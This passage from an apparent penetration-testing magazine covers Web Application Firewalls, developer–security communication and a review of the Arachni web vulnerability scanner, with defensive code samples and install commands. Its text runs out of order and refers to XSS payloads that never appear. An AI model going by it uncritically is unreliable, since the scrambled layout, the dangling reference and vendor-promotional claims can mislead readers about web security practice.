internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly, simply and in as many ways as possible. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how much they knew.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. Attackers gain access to the browser via infected web applications, and through it to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not perform any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. A single unsecured web application endangers the security of downstream systems such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who carry the big responsibility here towards all those who use their applications – one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. Conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements for service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, it also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have lately started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information, which gives them an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not just use the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program ever went into productive operation free of errors or without weak spots; the shortcomings are frequently uncovered only over time. And by this time, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more securely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused via SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example also shows that it is not sufficient to just position a WAF in front of the web application without an analysis – that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load balancing in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and contents of parameters can also be checked in this way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value range.
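The general parameter rules described above can be sketched as a simple filter. The rule values and names below are illustrative, not taken from any specific WAF product:

```javascript
// Sketch of WAF-style parameter rules: expected parameter count,
// maximum value length and a permitted character set. The limits and
// the regular expression are illustrative examples only.
function checkRequestParams(params, rules) {
  const names = Object.keys(params);
  // Block requests carrying more parameters than the form defines.
  if (names.length > rules.maxParams) return false;
  for (const name of names) {
    const value = String(params[name]);
    if (value.length > rules.maxLength) return false; // overlong value
    if (!rules.allowed.test(value)) return false;     // forbidden character
  }
  return true;
}

const rules = { maxParams: 2, maxLength: 64, allowed: /^[\w .@-]*$/ };

console.log(checkRequestParams({ search: "pentest", Submit: "Submit" }, rules)); // true
// An unexpected third parameter, or markup characters, is rejected:
console.log(checkRequestParams({ a: "1", b: "2", c: "3" }, rules));              // false
console.log(checkRequestParams({ search: "<script>" }, rules));                  // false
```

Even such coarse rules already stop the reflected-XSS payloads shown earlier, since the angle brackets fall outside the permitted character set.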
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully-developed rule set for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2. An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can – to a certain extent – automatically prevent malicious code from reaching the browser if, for example, a web application does not sufficiently check the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that appear to violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler suggests exemption rules that prevent a similar false positive from recurring.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even after the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as it is deployed in line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF can protect web applications against attacks such as session spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode, and only in this mode are certain special functions available. As a Full Reverse Proxy a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, that is, the rewriting of URLs used in public requests to the web application's hidden URLs; this means that the application's actual web address remains cloaked. With proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also provide cloaking techniques, Layer 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. Masking outgoing data protects against data theft, and cookie security prevents identity theft. But proxy WAFs must also be configured to correspond with the respective environment; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible exfiltration of sensitive data and then stops it.
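As a rough illustration of such an outgoing check, the sketch below scans a response body for digit runs of card-number length and confirms them with the Luhn checksum before flagging a candidate PAN. The function names are invented; a real WAF's data-leakage detection is far more involved (context, masking, tokenization).

```ruby
# Luhn checksum: the standard validity test for card numbers.
def luhn_valid?(digits)
  sum = digits.reverse.chars.each_with_index.sum do |c, i|
    d = c.to_i
    d *= 2 if i.odd?        # double every second digit from the right
    d > 9 ? d - 9 : d       # digits above 9 are reduced by 9
  end
  sum % 10 == 0
end

# Flag only digit runs that actually pass the checksum, to keep
# arbitrary numeric identifiers from triggering false positives.
def leaked_pans(body)
  body.scan(/\b\d{13,16}\b/).select { |candidate| luhn_valid?(candidate) }
end
```

A response containing 4111111111111111 (a well-known Luhn-valid test number) would be flagged, while an arbitrary 16-digit order ID usually would not.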
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include, in particular, identity and access management. In this context the principle of least privilege applies: users are awarded privileges only on a need-to-have basis for their work or their use of the web application; all other privileges are blocked. Integration of the WAF with Active Directory, eDirectory, or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions are intuitive, clearly displayed, and easy to understand and to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products, or, even better, a management center that administrators can use to manage numerous other network and security products alongside the WAF. Administrators can then rely on familiar configuration processes for security clusters, which ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of the security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance, and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available for download on December 22nd

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
WEB APP SECURITY
Application Security members are considered like the tax man asking for money: security is sometimes seen as a cost to pay in order to get an application into production. Actually, it is a little of everyone's fault. Since security people and developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand-new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign on the new product line. Marketers might ask the developers for something like Give us the latest Web 2.0, social-enabled website, or something like that to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more. Security is slowly pushed aside so that coding and production can meet the deadline. Most software architecture is not designed with security in mind, and project Gantt charts usually include no security checkpoints for code testing, nor do they allow time for security fixes or remediation.

Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this on-line, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom; for example, the report might state that a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before use. The report does not contain all
Developers are from Venus, Application Security Guys are from Mars

We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal: building secure code.
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not open source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The requested effort is minimal compared to translating an implement a filtering policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy. There is a third approach I will cover in a follow-up article: BDD. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write the test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: in the WAPT activity, instead of an implement a filtering policy statement, you produce a set of rspec/cucumber scenarios modeling how the source code must deal with malformed input. Then the development team corrects the code until it passes all of the test cases; when testing is complete and all tests pass, it means your source code has implemented the filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed input and why it is so important to the Application Security group.
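In a real project these scenarios would be rspec examples or cucumber steps driven against the running application; as a dependency-free sketch of the same idea, each scenario below states the behaviour required of a hypothetical filter_comment input filter and fails loudly when the code does not comply.

```ruby
# Invented stand-in for the filter the scenarios drive out: the behaviour
# they demand is that angle brackets must not survive into the output.
def filter_comment(input)
  input.gsub("<", "&lt;").gsub(">", "&gt;")
end

# BDD-style scenarios: name => [given input, expected behaviour].
scenarios = {
  "a plain comment passes through unchanged" => ["hello", "hello"],
  "a script tag is neutralised"              => ["<script>", "&lt;script&gt;"],
  "mixed content keeps its text"             => ["a<b>c", "a&lt;b&gt;c"],
}

scenarios.each do |name, (given, expected)|
  actual = filter_comment(given)
  abort "FAIL: #{name} (got #{actual.inspect})" unless actual == expected
  puts "PASS: #{name}"
end
```

The scenarios, not the filter, are the deliverable: the security team writes them, and the developers change the code until every one passes.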
In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process using a language without common ground, which further confuses or annoys everyone and pushes the groups even further apart.
Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information with which to pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most of the remediation consists of source code fixes.
The security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by the OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer: they want to know the module, class, or line where the problem exists so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production on schedule.
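To make the symptom/root-cause distinction concrete, here is a hypothetical Ruby sketch: the report would say SQL injection is possible, while the fix addresses the root cause by whitelisting the configuration-supplied table name and binding the user input. All names here are invented for illustration.

```ruby
# Symptom the report flags ("SQL injection is possible"): both the config
# value and the user input are interpolated straight into the SQL text.
def report_query_vulnerable(table_from_config, user_input)
  "SELECT * FROM #{table_from_config} WHERE name = '#{user_input}'"
end

# Root-cause fix: whitelist the value read from configuration and hand
# the user input to the database driver as a bind parameter.
ALLOWED_TABLES = %w[products orders].freeze

def report_query_fixed(table_from_config, user_input)
  unless ALLOWED_TABLES.include?(table_from_config)
    raise ArgumentError, "unexpected table from config: #{table_from_config}"
  end
  # Only the placeholder travels in the SQL text; the value never does.
  ["SELECT * FROM #{table_from_config} WHERE name = ?", [user_input]]
end
```

A report that names the unsanitized config parameter points the developer straight at the second function's checks, instead of leaving them to rediscover the data flow from scratch.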
Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:

• creating a development framework that has security built into it;
• designing an API to be used by the application.
Putting security into the framework is the Rails approach. Rails' developers added security facilities inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection, and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works for a programming language that includes a secure framework for developing web applications. This is true for the Ruby community (other frameworks, like Sinatra, have some security facilities as well). In the Java programming language community, there are a lot of non-standardized frameworks available for Java developers.
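The inherited protection described above ultimately comes down to output escaping. Ruby's standard library exposes escaping equivalent to what Rails' h helper performs, so the mechanism can be shown as a minimal, framework-free sketch:

```ruby
require "erb"

# A payload that would execute if rendered raw into a page.
payload = "<script>alert('xss')</script>"

# ERB::Util.html_escape neutralises the markup before it reaches the
# browser; Rails' helpers apply this kind of escaping automatically.
escaped = ERB::Util.html_escape(payload)

puts escaped  # the angle brackets are now HTML entities, not markup
```

Because the framework applies this for every rendered value, the developer gets the protection without having to remember it at each call site — the transparency the text asks for.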
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He is interested in code review, and he is working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar, and practicing the Tae kwon-do ITF martial art. He is a husband, a daddy, and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). Those tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni is better compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools for the job at hand. Is Arachni worthwhile? Time for an in-depth review.
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward from a user's or component developer's point of view.
• A stable, efficient, and high-performance framework: Arachni allows custom modules, reports, and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.
Pulling the Legs of Arachni

Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1. Overview of the audit and reconnaissance modules included with Arachni

Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).

This is great if you want to speed up the scan, or if you want to execute some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architectural point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that execute the scan. The connection to these dispatchers can be secured with SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients, and multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1, and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
At the start of every scan a crawler tries to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
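The filtering concept just described — redundancy rules that pair a pattern with a counter, plus plain include/exclude patterns — can be sketched as follows. This mirrors the idea only; the class and its interface are invented, not Arachni's actual crawler code.

```ruby
# Hypothetical crawl filter: exclude patterns win outright, an optional
# include-only pattern restricts scope, and redundancy rules allow a URL
# pattern to be followed at most N times (e.g. calendar pages).
class CrawlFilter
  def initialize(redundant:, exclude: [], include_only: nil)
    @redundant    = redundant.map { |rx, max| [rx, max] }  # pattern, visits left
    @exclude      = exclude
    @include_only = include_only
  end

  def follow?(url)
    return false if @exclude.any? { |rx| url =~ rx }
    return false if @include_only && url !~ @include_only

    if (rule = @redundant.find { |rx, _| url =~ rx })
      return false if rule[1] <= 0   # counter exhausted: treat as redundant
      rule[1] -= 1
    end
    true
  end
end
```

With a rule like `/calendar/ => 2`, the first two calendar URLs are crawled and the rest are skipped, which keeps infinite date-navigation pages from trapping the crawler.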
The HTML parser can extract forms, links, cookies, and headers. It gracefully handles badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.
Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni also offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.
Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in, and/or restricting the scope of the audit.
• Form-based AutoLogin: performs an automated login.
• Dictionary attacker: performs dictionary attacks against HTTP authentication and form-based authentication.
• Profiler: performs taint analysis with benign inputs and response time analysis.
• Cookie collector: keeps track of cookies while establishing a timeline of the changes.
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL.
• Content-types: logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files.
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine whether malicious inputs cause any behavioural changes.
• Metamodules: loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
  • TimeoutNotice: provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing.
  • Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization.
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.

Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.

Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
